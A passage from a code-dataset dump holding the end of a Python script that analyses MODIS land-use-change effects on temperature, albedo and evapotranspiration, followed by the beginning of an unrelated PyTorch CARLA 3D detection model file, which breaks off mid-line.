Mean','ET Mean','LST STD','Albedo STD','ET STD']\r\n\r\nwith open(out_dir +analyses_mode+\"_report.txt\", \"a\") as text_file:\r\n    print(\"\\n Mean and STD of water vs. 
energy limited LST, albedo and ET for EF to sparse conversion:\",\r\n          file=text_file,\r\n          )\r\n    print(ef_sparse_el_wl_df, file=text_file)\r\ntext_file.close()\r\n\r\n# extract_wl_el(orig_class=EF, val=3, outname=\"EF_shrub_EL_WL.png\") # Not enough data\r\n# extract_wl_el(orig_class=DF, val=5, outname=\"DF_sparse_EL_WL.png\") # Not enough data\r\n# extract_wl_el(orig_class=DF, val=4, outname=\"DF_herb_EL_WL.png\") # Not enough data\r\n# extract_wl_el(\r\n# \torig_class=shrub, val=5, outname=\"Shrub_sparse_EL_WL.png\"\r\n# ) # Not enough data\r\n\r\nprint(\"Extracting Herbaceous to Sparse energy vs. water limited LST, albedo and ET\\n\")\r\n# Herb to sparse conversion, for which we have enough data to analyze\r\nlst_EL_WL, albedo_EL_WL, et_EL_WL = extract_wl_el(\r\n\torig_class=herb, val=5\r\n) # There are enough data\r\n\r\ndf1 = {\"name\": \"LST\", \"df\": lst_EL_WL, \"label\": \"$\\Delta$LST [C]\", \"ylim\": [-12, 12]}\r\ndf2 = {\r\n\t\"name\": \"Albedo\",\r\n\t\"df\": albedo_EL_WL,\r\n\t\"label\": \"$\\Delta$Albedo\",\r\n\t\"ylim\": [-0.5, 0.5],\r\n}\r\ndf3 = {\r\n\t\"name\": \"ET\",\r\n\t\"df\": et_EL_WL,\r\n\t\"label\": \"$\\Delta$ET [mm/year]\",\r\n\t\"ylim\": [-850, 850],\r\n}\r\nprint(f\"saving Herb_sparse_EL_WL.png in {fig_dir}\")\r\nmyboxplot_group(\r\n\tdf1, df2, df3, columns=class_name, txt_pos=9, outname=\"Herb_sparse_EL_WL.png\"\r\n)\r\n\r\nlst_mean=lst_EL_WL.mean()\r\nalbedo_mean=albedo_EL_WL.mean()\r\net_mean=et_EL_WL.mean()\r\nlst_std=lst_EL_WL.std()\r\nalbedo_std=albedo_EL_WL.std()\r\net_std=et_EL_WL.std()\r\n\r\nherb_sparse_el_wl_df = pd.concat([lst_mean,albedo_mean,et_mean,lst_std,albedo_std,et_std],axis=1)\r\nherb_sparse_el_wl_df.columns = ['LST Mean','Albedo Mean','ET Mean','LST STD','Albedo STD','ET STD']\r\n\r\nwith open(out_dir +analyses_mode+\"_report.txt\", \"a\") as text_file:\r\n    print(\"\\n Mean and STD of water vs. 
energy limited LST, albedo and ET for herb to sparse conversion:\",\r\n file=text_file,\r\n )\r\n print(herb_sparse_el_wl_df, file=text_file)\r\ntext_file.close()\r\n\r\n# extract_wl_el(\r\n# \torig_class=sparse, val=3, outname=\"Sparse_shrub_EL_WL.png\"\r\n# ) # Not enough data\r\n# extract_wl_el(\r\n# \torig_class=sparse, val=4, outname=\"Sparse_herb_EL_WL.png\"\r\n# ) # Not enough data\r\n# extract_wl_el(\r\n# \torig_class=wetland, val=5, outname=\"Wetland_sparse_EL_WL.png\"\r\n# ) # Not enough data\r\n\r\n\r\n\"\"\"---------------------------------------------------------------------------\r\n\r\n\t\t\t\t\tNow we focus on different components of the ET \r\n\r\n------------------------------------------------------------------------------\"\"\"\r\nprint('----------------- Plotting ET component -----------------\\n')\r\nEC_EF_to_shrub = extract_vals(EF, 3, \"ec\", \"EC_EF_to_shrub\")\r\n# ET_EF_to_herb = extract_vals(EF, 4, \"et\", \"ET_EF_to_herb\")\r\nEC_EF_to_sparse = extract_vals(EF, 5, \"ec\", \"EC_EF_to_sparse\")\r\n\r\n# ET_DF_to_shrub = extract_vals(DF, 3, \"et\", \"ET_DF_to_shrub\")\r\nEC_DF_to_herb = extract_vals(DF, 4, \"ec\", \"EC_DF_to_herb\")\r\nEC_DF_to_sparse = extract_vals(DF, 5, \"ec\", \"EC_DF_to_sparse\")\r\n\r\nEC_shrub_to_sparse = extract_vals(shrub, 5, \"ec\", \"EC_shrub_to_sparse\")\r\n# ET_shrub_to_wetland = extract_vals(shrub, 6, \"et\", \"ET_shrub_to_wetland\")\r\n\r\nEC_herb_to_shrub = extract_vals(herb, 3, \"ec\", \"EC_herb_to_shrub\")\r\nEC_herb_to_sparse = extract_vals(herb, 5, \"ec\", \"EC_herb_to_sparse\")\r\n# ET_herb_to_wetland = extract_vals(herb, 6, \"et\", \"ET_herb_to_wetland\")\r\n\r\nEC_sparse_to_shrub = extract_vals(sparse, 3, \"ec\", \"EC_sparse_to_shrub\")\r\nEC_sparse_to_herb = extract_vals(sparse, 4, \"ec\", \"EC_sparse_to_herb\")\r\n\r\nEC_wetland_to_sparse = extract_vals(wetland, 5, \"ec\", \"EC_wetland_to_sparse\")\r\n\r\n# ET_water_to_sparse = extract_vals(water, 5, \"et\", \"ET_water_to_sparse\")\r\n# ET_water_to_wetland = extract_vals(water, 6, \"et\", \"ET_water_to_wetland\")\r\n\r\ndf_ec = pd.concat(\r\n\t[\r\n\t\tEC_EF_to_shrub,\r\n\t\t# ET_EF_to_herb,\r\n\t\tEC_EF_to_sparse,\r\n\t\t# ET_DF_to_shrub,\r\n\t\tEC_DF_to_herb,\r\n\t\tEC_DF_to_sparse,\r\n\t\tEC_shrub_to_sparse,\r\n\t\t# ET_shrub_to_wetland,\r\n\t\tEC_herb_to_shrub,\r\n\t\tEC_herb_to_sparse,\r\n\t\t# ET_herb_to_wetland,\r\n\t\tEC_sparse_to_shrub,\r\n\t\tEC_sparse_to_herb,\r\n\t\tEC_wetland_to_sparse,\r\n\t\t# ET_water_to_sparse,\r\n\t\t# ET_water_to_wetland,\r\n\t],\r\n\tignore_index=True,\r\n\taxis=1,\r\n)\r\n\r\ndf_ec.columns = columns\r\nprint(f\"saving EC_Boxplot.png in {fig_dir}\")\r\nmyboxplot(\r\n\tdf=df_ec,\r\n\ttitle=\"EC\",\r\n\tylabel=\"EC [mm $year^{-1}$]\",\r\n\tmargin=5,\r\n\toutname=\"EC_Boxplot.png\",\r\n)\r\n\r\n\r\nES_EF_to_shrub = extract_vals(EF, 3, \"es\", \"ES_EF_to_shrub\")\r\n# ET_EF_to_herb = extract_vals(EF, 4, \"et\", \"ET_EF_to_herb\")\r\nES_EF_to_sparse = extract_vals(EF, 5, \"es\", \"ES_EF_to_sparse\")\r\n\r\n# ET_DF_to_shrub = extract_vals(DF, 3, \"et\", \"ET_DF_to_shrub\")\r\nES_DF_to_herb = extract_vals(DF, 4, \"es\", \"ES_DF_to_herb\")\r\nES_DF_to_sparse = extract_vals(DF, 5, \"es\", \"ES_DF_to_sparse\")\r\n\r\nES_shrub_to_sparse = extract_vals(shrub, 5, \"es\", \"ES_shrub_to_sparse\")\r\n# ET_shrub_to_wetland = extract_vals(shrub, 6, \"et\", \"ET_shrub_to_wetland\")\r\n\r\nES_herb_to_shrub = extract_vals(herb, 3, \"es\", \"ES_herb_to_shrub\")\r\nES_herb_to_sparse = extract_vals(herb, 5, \"es\", \"ES_herb_to_sparse\")\r\n# 
ET_herb_to_wetland = extract_vals(herb, 6, \"et\", \"ET_herb_to_wetland\")\r\n\r\nES_sparse_to_shrub = extract_vals(sparse, 3, \"es\", \"ES_sparse_to_shrub\")\r\nES_sparse_to_herb = extract_vals(sparse, 4, \"es\", \"ES_sparse_to_herb\")\r\n\r\nES_wetland_to_sparse = extract_vals(wetland, 5, \"es\", \"ES_wetland_to_sparse\")\r\n\r\n# ET_water_to_sparse = extract_vals(water, 5, \"et\", \"ET_water_to_sparse\")\r\n# ET_water_to_wetland = extract_vals(water, 6, \"et\", \"ET_water_to_wetland\")\r\n\r\ndf_es = pd.concat(\r\n\t[\r\n\t\tES_EF_to_shrub,\r\n\t\t# ET_EF_to_herb,\r\n\t\tES_EF_to_sparse,\r\n\t\t# ET_DF_to_shrub,\r\n\t\tES_DF_to_herb,\r\n\t\tES_DF_to_sparse,\r\n\t\tES_shrub_to_sparse,\r\n\t\t# ET_shrub_to_wetland,\r\n\t\tES_herb_to_shrub,\r\n\t\tES_herb_to_sparse,\r\n\t\t# ET_herb_to_wetland,\r\n\t\tES_sparse_to_shrub,\r\n\t\tES_sparse_to_herb,\r\n\t\tES_wetland_to_sparse,\r\n\t\t# ET_water_to_sparse,\r\n\t\t# ET_water_to_wetland,\r\n\t],\r\n\tignore_index=True,\r\n\taxis=1,\r\n)\r\n\r\ndf_es.columns = columns\r\nprint(f\"saving ES_Boxplot.png in {fig_dir}\")\r\nmyboxplot(\r\n\tdf=df_es,\r\n\ttitle=\"ES\",\r\n\tylabel=\"ES [mm $year^{-1}$]\",\r\n\tmargin=5,\r\n\toutname=\"ES_Boxplot.png\",\r\n)\r\n\r\n\r\nEW_EF_to_shrub = extract_vals(EF, 3, \"ew\", \"EW_EF_to_shrub\")\r\n# ET_EF_to_herb = extract_vals(EF, 4, \"et\", \"ET_EF_to_herb\")\r\nEW_EF_to_sparse = extract_vals(EF, 5, \"ew\", \"EW_EF_to_sparse\")\r\n\r\n# ET_DF_to_shrub = extract_vals(DF, 3, \"et\", \"ET_DF_to_shrub\")\r\nEW_DF_to_herb = extract_vals(DF, 4, \"ew\", \"EW_DF_to_herb\")\r\nEW_DF_to_sparse = extract_vals(DF, 5, \"ew\", \"EW_DF_to_sparse\")\r\n\r\nEW_shrub_to_sparse = extract_vals(shrub, 5, \"ew\", \"EW_shrub_to_sparse\")\r\n# ET_shrub_to_wetland = extract_vals(shrub, 6, \"et\", \"ET_shrub_to_wetland\")\r\n\r\nEW_herb_to_shrub = extract_vals(herb, 3, \"ew\", \"EW_herb_to_shrub\")\r\nEW_herb_to_sparse = extract_vals(herb, 5, \"ew\", \"EW_herb_to_sparse\")\r\n# ET_herb_to_wetland = extract_vals(herb, 6, \"et\", \"ET_herb_to_wetland\")\r\n\r\nEW_sparse_to_shrub = extract_vals(sparse, 3, \"ew\", \"EW_sparse_to_shrub\")\r\nEW_sparse_to_herb = extract_vals(sparse, 4, \"ew\", \"EW_sparse_to_herb\")\r\n\r\nEW_wetland_to_sparse = extract_vals(wetland, 5, \"ew\", \"EW_wetland_to_sparse\")\r\n\r\n# ET_water_to_sparse = extract_vals(water, 5, \"et\", \"ET_water_to_sparse\")\r\n# ET_water_to_wetland = extract_vals(water, 6, \"et\", \"ET_water_to_wetland\")\r\n\r\ndf_ew = pd.concat(\r\n\t[\r\n\t\tEW_EF_to_shrub,\r\n\t\t# ET_EF_to_herb,\r\n\t\tEW_EF_to_sparse,\r\n\t\t# ET_DF_to_shrub,\r\n\t\tEW_DF_to_herb,\r\n\t\tEW_DF_to_sparse,\r\n\t\tEW_shrub_to_sparse,\r\n\t\t# ET_shrub_to_wetland,\r\n\t\tEW_herb_to_shrub,\r\n\t\tEW_herb_to_sparse,\r\n\t\t# ET_herb_to_wetland,\r\n\t\tEW_sparse_to_shrub,\r\n\t\tEW_sparse_to_herb,\r\n\t\tEW_wetland_to_sparse,\r\n\t\t# ET_water_to_sparse,\r\n\t\t# ET_water_to_wetland,\r\n\t],\r\n\tignore_index=True,\r\n\taxis=1,\r\n)\r\n\r\ndf_ew.columns = columns\r\nprint(f\"saving EW_Boxplot.png in {fig_dir}\")\r\nmyboxplot(\r\n\tdf=df_ew,\r\n\ttitle=\"EW\",\r\n\tylabel=\"EW [mm $year^{-1}$]\",\r\n\tmargin=5,\r\n\toutname=\"EW_Boxplot.png\",\r\n)\r\n\r\nECI_EF_to_shrub = extract_vals(EF, 3, \"eci\", \"ECI_EF_to_shrub\")\r\n# ET_EF_to_herb = extract_vals(EF, 4, \"et\", \"ET_EF_to_herb\")\r\nECI_EF_to_sparse = extract_vals(EF, 5, \"eci\", \"ECI_EF_to_sparse\")\r\n\r\n# ET_DF_to_shrub = extract_vals(DF, 3, \"et\", \"ET_DF_to_shrub\")\r\nECI_DF_to_herb = extract_vals(DF, 4, \"eci\", 
\"ECI_DF_to_herb\")\r\nECI_DF_to_sparse = extract_vals(DF, 5, \"eci\", \"ECI_DF_to_sparse\")\r\n\r\nECI_shrub_to_sparse = extract_vals(shrub, 5, \"eci\", \"ECI_shrub_to_sparse\")\r\n# ET_shrub_to_wetland = extract_vals(shrub, 6, \"et\", \"ET_shrub_to_wetland\")\r\n\r\nECI_herb_to_shrub = extract_vals(herb, 3, \"eci\", \"ECI_herb_to_shrub\")\r\nECI_herb_to_sparse = extract_vals(herb, 5, \"eci\", \"ECI_herb_to_sparse\")\r\n# ET_herb_to_wetland = extract_vals(herb, 6, \"et\", \"ET_herb_to_wetland\")\r\n\r\nECI_sparse_to_shrub = extract_vals(sparse, 3, \"eci\", \"ECI_sparse_to_shrub\")\r\nECI_sparse_to_herb = extract_vals(sparse, 4, \"eci\", \"ECI_sparse_to_herb\")\r\n\r\nECI_wetland_to_sparse = extract_vals(wetland, 5, \"eci\", \"ECI_wetland_to_sparse\")\r\n\r\n# ET_water_to_sparse = extract_vals(water, 5, \"et\", \"ET_water_to_sparse\")\r\n# ET_water_to_wetland = extract_vals(water, 6, \"et\", \"ET_water_to_wetland\")\r\n\r\ndf_eci = pd.concat(\r\n\t[\r\n\t\tECI_EF_to_shrub,\r\n\t\t# ET_EF_to_herb,\r\n\t\tECI_EF_to_sparse,\r\n\t\t# ET_DF_to_shrub,\r\n\t\tECI_DF_to_herb,\r\n\t\tECI_DF_to_sparse,\r\n\t\tECI_shrub_to_sparse,\r\n\t\t# ET_shrub_to_wetland,\r\n\t\tECI_herb_to_shrub,\r\n\t\tECI_herb_to_sparse,\r\n\t\t# ET_herb_to_wetland,\r\n\t\tECI_sparse_to_shrub,\r\n\t\tECI_sparse_to_herb,\r\n\t\tECI_wetland_to_sparse,\r\n\t\t# ET_water_to_sparse,\r\n\t\t# ET_water_to_wetland,\r\n\t],\r\n\tignore_index=True,\r\n\taxis=1,\r\n)\r\n\r\ndf_eci.columns = columns\r\nprint(f\"saving ECI_Boxplot.png in {fig_dir}\")\r\nmyboxplot(\r\n\tdf=df_eci,\r\n\ttitle=\"ECI\",\r\n\tylabel=\"ECI [mm $year^{-1}$]\",\r\n\tmargin=5,\r\n\toutname=\"ECI_Boxplot.png\",\r\n)\r\n\r\nESW_EF_to_shrub = extract_vals(EF, 3, \"esw\", \"ESW_EF_to_shrub\")\r\n# ET_EF_to_herb = extract_vals(EF, 4, \"et\", \"ET_EF_to_herb\")\r\nESW_EF_to_sparse = extract_vals(EF, 5, \"esw\", \"ESW_EF_to_sparse\")\r\n\r\n# ET_DF_to_shrub = extract_vals(DF, 3, \"et\", \"ET_DF_to_shrub\")\r\nESW_DF_to_herb = extract_vals(DF, 4, \"esw\", \"ESW_DF_to_herb\")\r\nESW_DF_to_sparse = extract_vals(DF, 5, \"esw\", \"ESW_DF_to_sparse\")\r\n\r\nESW_shrub_to_sparse = extract_vals(shrub, 5, \"esw\", \"ESW_shrub_to_sparse\")\r\n# ET_shrub_to_wetland = extract_vals(shrub, 6, \"et\", \"ET_shrub_to_wetland\")\r\n\r\nESW_herb_to_shrub = extract_vals(herb, 3, \"esw\", \"ESW_herb_to_shrub\")\r\nESW_herb_to_sparse = extract_vals(herb, 5, \"esw\", \"ESW_herb_to_sparse\")\r\n# ET_herb_to_wetland = extract_vals(herb, 6, \"et\", \"ET_herb_to_wetland\")\r\n\r\nESW_sparse_to_shrub = extract_vals(sparse, 3, \"esw\", \"ESW_sparse_to_shrub\")\r\nESW_sparse_to_herb = extract_vals(sparse, 4, \"esw\", \"ESW_sparse_to_herb\")\r\n\r\nESW_wetland_to_sparse = extract_vals(wetland, 5, \"esw\", \"ESW_wetland_to_sparse\")\r\n\r\n# ET_water_to_sparse = extract_vals(water, 5, \"et\", \"ET_water_to_sparse\")\r\n# ET_water_to_wetland = extract_vals(water, 6, \"et\", \"ET_water_to_wetland\")\r\n\r\ndf_esw = pd.concat(\r\n\t[\r\n\t\tESW_EF_to_shrub,\r\n\t\t# ET_EF_to_herb,\r\n\t\tESW_EF_to_sparse,\r\n\t\t# ET_DF_to_shrub,\r\n\t\tESW_DF_to_herb,\r\n\t\tESW_DF_to_sparse,\r\n\t\tESW_shrub_to_sparse,\r\n\t\t# ET_shrub_to_wetland,\r\n\t\tESW_herb_to_shrub,\r\n\t\tESW_herb_to_sparse,\r\n\t\t# ET_herb_to_wetland,\r\n\t\tESW_sparse_to_shrub,\r\n\t\tESW_sparse_to_herb,\r\n\t\tESW_wetland_to_sparse,\r\n\t\t# ET_water_to_sparse,\r\n\t\t# ET_water_to_wetland,\r\n\t],\r\n\tignore_index=True,\r\n\taxis=1,\r\n)\r\n\r\ndf_esw.columns = columns\r\nprint(f\"saving ESW_Boxplot.png in 
{fig_dir}\")\r\nmyboxplot(\r\n\tdf=df_esw,\r\n\ttitle=\"ESW\",\r\n\tylabel=\"ESW [mm $year^{-1}$]\",\r\n\tmargin=5,\r\n\toutname=\"ESW_Boxplot.png\",\r\n)\r\n\r\ndf1 = {\r\n\t\"name\": \"CI\",\r\n\t\"df\": df_eci,\r\n\t\"label\": \"$\\Delta$CI [mm/year]]\",\r\n\t\"ylim\": [-300, 300],\r\n}\r\ndf2 = {\r\n\t\"name\": \"SW\",\r\n\t\"df\": df_esw,\r\n\t\"label\": \"$\\Delta$SW [mm/year]]\",\r\n\t\"ylim\": [-300, 300],\r\n}\r\n\r\ndf3 = {\"name\": \"ET\", \"df\": df_et, \"label\": \"$\\Delta$ET [mm/year]]\", \"ylim\": [-850, 850],}\r\nmyboxplot_group(\r\n\tdf1, df2, df3, columns=columns, txt_pos=200, outname=\"ET_Components_integrated.png\"\r\n)\r\n\r\ndf_eci_mean = df_eci.mean()\r\ndf_esw_mean = df_esw.mean()\r\ndf_et_mean = df_et.mean()\r\ndf_eci_std = df_eci.std()\r\ndf_esw_std = df_esw.std()\r\ndf_et_std = df_et.std()\r\n\r\nframes = pd.concat([df_eci_mean,df_esw_mean,df_et_mean,df_eci_std,df_esw_std,df_et_std],axis=1)\r\nframes.columns = [\"ECI Mean\",\"ESW Mean\",\"ET Mean\",\"ECI STD\",\"ESW STD\",\"ET STD\"]\r\n\r\nwith open(out_dir +analyses_mode+\"_report.txt\", \"a\") as text_file:\r\n print(\"\\n Mean and STD of ET components for different LUC conversions:\",\r\n file=text_file,\r\n )\r\n print(frames, file=text_file)\r\ntext_file.close()\r\nprint(\"Mean and STD of ET components for different LUC conversions:\")\r\nprint(frames)\r\n\r\n\"\"\" ------------------------------------------------------------------\r\nAnalyzing an two example pixles where one the LUC (e.g. DF) is changed\r\nand the other which is approximaltly close hasn't been changed. These pixles \r\nare arbitrary and just for show. \r\n-------------------------------------------------------------------\"\"\"\r\nprint('----------------- Working on the example (note this is just for the presentation and everything is arbitarary) -----------------\\n')\r\n# The year DF_2007 is just two aribitraty pixels to show the changes between changed and unchaneged pixels (for presentation purposes)\r\nDF_2007 = DF.sel(year=2007)\r\n# Find the coordinates of a random pixel where DF changed to herbaceuous\r\nx_changed, y_changed = find_coord(DF_2007, 4, 2)\r\n# some arbitarary pixle nearby with no change in DF class (~94%)\r\nx_not_changed = -121.6786\r\ny_not_changed = 56.2286\r\n\r\nlst_changed = lst.sel(x=x_changed, y=y_changed, method=\"nearest\")\r\nlst_not_changed = lst.sel(x=x_not_changed, y=y_not_changed, method=\"nearest\")\r\nplot_example(lst_changed, lst_not_changed, \"LST [C]\", outname=\"LST_DF_Herb_Example.png\")\r\n\r\nlst_lulc_changed = lst_lulc.sel(x=x_changed, y=y_changed, method=\"nearest\")\r\nlst_nv_changed = lst_nv.sel(x=x_changed, y=y_changed, method=\"nearest\")\r\n\r\nlst_diff_total_changed = lst_diff_total.sel(x=x_changed, y=y_changed, method=\"nearest\")\r\nlst_diff_total_not_changed = lst_diff_total.sel(\r\n\tx=x_not_changed, y=y_not_changed, method=\"nearest\"\r\n)\r\nplot_example(\r\n\tlst_diff_total_changed,\r\n\tlst_diff_total_not_changed,\r\n\tr\"$\\Delta$ LST [C]\",\r\n\toutname=\"LST_DF_Herb_trend_Example.png\",\r\n)\r\n\r\nalbedo_changed = albedo.sel(x=x_changed, y=y_changed, method=\"nearest\")\r\nalbedo_not_changed = albedo.sel(x=x_not_changed, y=y_not_changed, method=\"nearest\")\r\nplot_example(\r\n\talbedo_changed, albedo_not_changed, \"Albedo\", outname=\"Albedo_DF_Herb_Example.png\"\r\n)\r\n\r\nalbedo_diff_changed = albedo_diff.sel(x=x_changed, y=y_changed, method=\"nearest\")\r\nalbedo_diff_not_changed = albedo_diff.sel(\r\n\tx=x_not_changed, y=y_not_changed, 
method=\"nearest\"\r\n)\r\nplot_example(\r\n\talbedo_diff_changed,\r\n\talbedo_diff_not_changed,\r\n\tr\"$\\Delta$ Albedo\",\r\n\toutname=\"Albedo_DF_Herb_trend_Example.png\",\r\n)\r\n\r\nET_changed = ET.sel(x=x_changed, y=y_changed, method=\"nearest\")\r\nET_not_changed = ET.sel(x=x_not_changed, y=y_not_changed, method=\"nearest\")\r\nplot_example(ET_changed, ET_not_changed, \"ET [mm/year]\", outname=\"ET.png\")\r\n\r\nEC_changed = EC.sel(x=x_changed, y=y_changed, method=\"nearest\")\r\nEC_not_changed = EC.sel(x=x_not_changed, y=y_not_changed, method=\"nearest\")\r\nplot_example(EC_changed, EC_not_changed, \"EC [mm/year]\", outname=\"EC.png\")\r\n\r\nES_changed = ES.sel(x=x_changed, y=y_changed, method=\"nearest\")\r\nES_not_changed = ES.sel(x=x_not_changed, y=y_not_changed, method=\"nearest\")\r\nplot_example(ES_changed, ES_not_changed, \"ES [mm/year]\", outname=\"ES.png\")\r\n\r\nEI_changed = EI.sel(x=x_changed, y=y_changed, method=\"nearest\")\r\nEI_not_changed = EI.sel(x=x_not_changed, y=y_not_changed, method=\"nearest\")\r\nplot_example(EI_changed, EI_not_changed, \"EI [mm/year]\", outname=\"EI.png\")\r\n\r\nprint('----------------- All done! -----------------\\n')\r\n\r\n# ------------------------------ End of the script --------------------------------------------","sub_path":"Modis/Main_Analyses_Annual.py","file_name":"Main_Analyses_Annual.py","file_ext":"py","file_size_in_byte":42196,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"183802955","text":"import time\nimport torch\nimport torch.nn as nn\nimport hyperparams as hyp\nimport numpy as np\nimport os\n\nfrom model_base import Model\nfrom nets.featnet3D import FeatNet3D\nfrom nets.occnet import OccNet\nfrom nets.flownet import FlowNet\nfrom nets.viewnet import ViewNet\nfrom nets.detnet import DetNet\nfrom nets.embnet2D import EmbNet2D\nfrom nets.embnet3D import EmbNet3D\n\nimport torch.nn.functional as F\n\nimport vox_util\nimport utils_samp\nimport utils_geom\nimport utils_misc\nimport utils_improc\nimport utils_basic\nimport utils_track\nimport frozen_flow_net\nimport utils_eval\n\nfrom tensorboardX import SummaryWriter\nfrom backend import saverloader, inputs\nfrom torchvision import datasets, transforms\n\nnp.set_printoptions(precision=2)\nnp.random.seed(0)\nEPS = 1e-6\nMAX_QUEUE = 10 # how many items before the summaryWriter flushes\n\nclass CARLA_DET(Model):\n def initialize_model(self):\n print(\"------ INITIALIZING MODEL OBJECTS ------\")\n self.model = CarlaDetModel()\n if hyp.do_freeze_feat3D:\n self.model.featnet3D.eval()\n self.set_requires_grad(self.model.featnet3D, False)\n if hyp.do_freeze_det:\n self.model.detnet.eval()\n self.set_requires_grad(self.model.detnet, False)\n\n # def go(self):\n # self.start_time = time.time()\n # self.initialize_model()\n # print(\"------ Done creating models ------\")\n # if hyp.lr > 0:\n # self.optimizer = torch.optim.Adam(self.model.parameters(), lr=hyp.lr)\n # self.start_iter = saverloader.load_weights(self.model, self.optimizer)\n # print(\"------ Done loading weights ------\")\n # else:\n # self.start_iter = 0\n\n # set_nums = []\n # set_names = []\n # set_inputs = []\n # set_writers = []\n # set_log_freqs = []\n # set_do_backprops = []\n # set_dicts = []\n # set_loaders = []\n\n # for set_name in hyp.set_names:\n # if hyp.sets_to_run[set_name]:\n # set_nums.append(hyp.set_nums[set_name])\n # set_names.append(set_name)\n # set_inputs.append(self.all_inputs[set_name])\n # set_writers.append(SummaryWriter(self.log_dir + 
'/' + set_name, max_queue=MAX_QUEUE, flush_secs=60))\n # set_log_freqs.append(hyp.log_freqs[set_name])\n # set_do_backprops.append(hyp.sets_to_backprop[set_name])\n # set_dicts.append({})\n # set_loaders.append(iter(set_inputs[-1]))\n\n # for step in list(range(self.start_iter+1, hyp.max_iters+1)):\n # for i, (set_input) in enumerate(set_inputs):\n # if step % len(set_input) == 0: #restart after one epoch. Note this does nothing for the tfrecord loader\n # set_loaders[i] = iter(set_input)\n\n # for (set_num,\n # set_name,\n # set_input,\n # set_writer,\n # set_log_freq,\n # set_do_backprop,\n # set_dict,\n # set_loader\n # ) in zip(\n # set_nums,\n # set_names,\n # set_inputs,\n # set_writers,\n # set_log_freqs,\n # set_do_backprops,\n # set_dicts,\n # set_loaders\n # ): \n\n # log_this = np.mod(step, set_log_freq)==0\n # total_time, read_time, iter_time = 0.0, 0.0, 0.0\n\n # if log_this or set_do_backprop:\n \n # read_start_time = time.time()\n\n # feed, _ = next(set_loader)\n # feed_cuda = {}\n # for k in feed:\n # try:\n # feed_cuda[k] = feed[k].cuda(non_blocking=True)\n # except:\n # # some things are not tensors (e.g., filename)\n # feed_cuda[k] = feed[k]\n\n # # feed_cuda = next(iter(set_input))\n # read_time = time.time() - read_start_time\n \n # feed_cuda['writer'] = set_writer\n # feed_cuda['global_step'] = step\n # feed_cuda['set_num'] = set_num\n # feed_cuda['set_name'] = set_name\n\n # filename = feed_cuda['filename'][0]\n # # print('filename = %s' % filename)\n # tokens = filename.split('/')\n # filename = tokens[-1]\n # # print('new filename = %s' % filename)\n \n # iter_start_time = time.time()\n # if set_do_backprop:\n # self.model.train()\n # loss, results, returned_early = self.model(feed_cuda)\n # else:\n # self.model.eval()\n # with torch.no_grad():\n # loss, results, returned_early = self.model(feed_cuda)\n # loss_py = loss.cpu().item()\n \n # if (not returned_early) and (set_do_backprop) and (hyp.lr > 0):\n # self.optimizer.zero_grad()\n # loss.backward()\n # self.optimizer.step()\n # iter_time = time.time()-iter_start_time\n # total_time = time.time()-self.start_time\n\n # print(\"%s; [%4d/%4d]; ttime: %.0f (%.2f, %.2f); loss: %.3f (%s)\" % (hyp.name,\n # step,\n # hyp.max_iters,\n # total_time,\n # read_time,\n # iter_time,\n # loss_py,\n # set_name))\n \n # if np.mod(step, hyp.snap_freq) == 0 and hyp.lr > 0:\n # saverloader.save(self.model, self.checkpoint_dir, step, self.optimizer)\n\n # for writer in set_writers: #close writers to flush cache into file\n # writer.close()\n \n\nclass CarlaDetModel(nn.Module):\n def __init__(self):\n super(CarlaDetModel, self).__init__()\n \n self.device = torch.device(\"cuda\")\n\n self.include_image_summs = True\n \n if hyp.do_feat3D:\n self.featnet3D = FeatNet3D(in_dim=4)\n if hyp.do_det:\n self.detnet = DetNet()\n \n def prepare_common_tensors(self, feed):\n\n results = dict()\n \n self.summ_writer = utils_improc.Summ_writer(\n writer=feed['writer'],\n global_step=feed['global_step'],\n log_freq=feed['set_log_freq'],\n fps=8,\n just_gif=True)\n global_step = feed['global_step']\n\n self.B = feed[\"set_batch_size\"]\n self.S = feed[\"set_seqlen\"]\n self.set_name = feed['set_name']\n \n __p = lambda x: utils_basic.pack_seqdim(x, self.B)\n __u = lambda x: utils_basic.unpack_seqdim(x, self.B)\n\n self.H, self.W, self.V, self.N = hyp.H, hyp.W, hyp.V, hyp.N\n self.PH, self.PW = hyp.PH, hyp.PW\n\n # if self.set_name=='test':\n # self.Z, self.Y, self.X = hyp.Z_test, hyp.Y_test, hyp.X_test\n # elif self.set_name=='val':\n # self.Z, 
self.Y, self.X = hyp.Z_val, hyp.Y_val, hyp.X_val\n # else:\n self.Z, self.Y, self.X = hyp.Z, hyp.Y, hyp.X\n self.Z2, self.Y2, self.X2 = int(self.Z/2), int(self.Y/2), int(self.X/2)\n self.Z4, self.Y4, self.X4 = int(self.Z/4), int(self.Y/4), int(self.X/4)\n\n self.ZZ, self.ZY, self.ZX = hyp.ZZ, hyp.ZY, hyp.ZX\n self.pix_T_cams = feed[\"pix_T_cams\"]\n set_data_format = feed['set_data_format']\n self.S = feed[\"set_seqlen\"]\n \n\n self.origin_T_camRs = feed[\"origin_T_camRs\"]\n self.origin_T_camXs = feed[\"origin_T_camXs\"]\n\n self.camX0s_T_camXs = utils_geom.get_camM_T_camXs(self.origin_T_camXs, ind=0)\n self.camR0s_T_camRs = utils_geom.get_camM_T_camXs(self.origin_T_camRs, ind=0)\n self.camRs_T_camR0s = __u(__p(self.camR0s_T_camRs).inverse())\n self.camRs_T_camXs = __u(torch.matmul(__p(self.origin_T_camRs).inverse(), __p(self.origin_T_camXs)))\n self.camXs_T_camRs = __u(__p(self.camRs_T_camXs).inverse())\n\n self.xyz_camXs = feed[\"xyz_camXs\"]\n self.xyz_camX0s = __u(utils_geom.apply_4x4(__p(self.camX0s_T_camXs), __p(self.xyz_camXs)))\n \n all_ok = False\n num_tries = 0\n while not all_ok:\n scene_centroid_x = np.random.uniform(-8.0, 8.0)\n scene_centroid_y = np.random.uniform(-1.5, 3.0)\n scene_centroid_z = np.random.uniform(10.0, 26.0)\n scene_centroid = np.array([scene_centroid_x,\n scene_centroid_y,\n scene_centroid_z]).reshape([1, 3])\n self.scene_centroid = torch.from_numpy(scene_centroid).float().cuda()\n num_tries += 1\n all_ok = True\n self.vox_util = vox_util.Vox_util(self.Z, self.Y, self.X, self.set_name, scene_centroid=self.scene_centroid, assert_cube=True)\n # we want to ensure this gives us a few points inbound for each batch el\n inb = __u(self.vox_util.get_inbounds(__p(self.xyz_camX0s), self.Z4, self.Y4, self.X4, already_mem=False))\n num_inb = torch.sum(inb.float(), axis=2)\n if torch.min(num_inb) < 200:\n all_ok = False\n if num_tries > 